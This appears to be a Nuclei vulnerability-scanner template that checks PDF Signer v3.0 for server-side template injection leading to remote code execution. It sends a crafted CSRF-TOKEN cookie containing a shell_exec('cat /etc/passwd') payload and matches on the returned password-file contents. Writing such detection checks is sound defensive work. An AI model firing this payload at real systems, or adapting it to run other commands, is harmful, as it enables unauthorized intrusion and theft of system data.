id: pdf-signer-ssti-to-rce
info:
name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
author: madrobot
severity: high
tags: ssti,rce,csrf
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
skip-variables-check: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body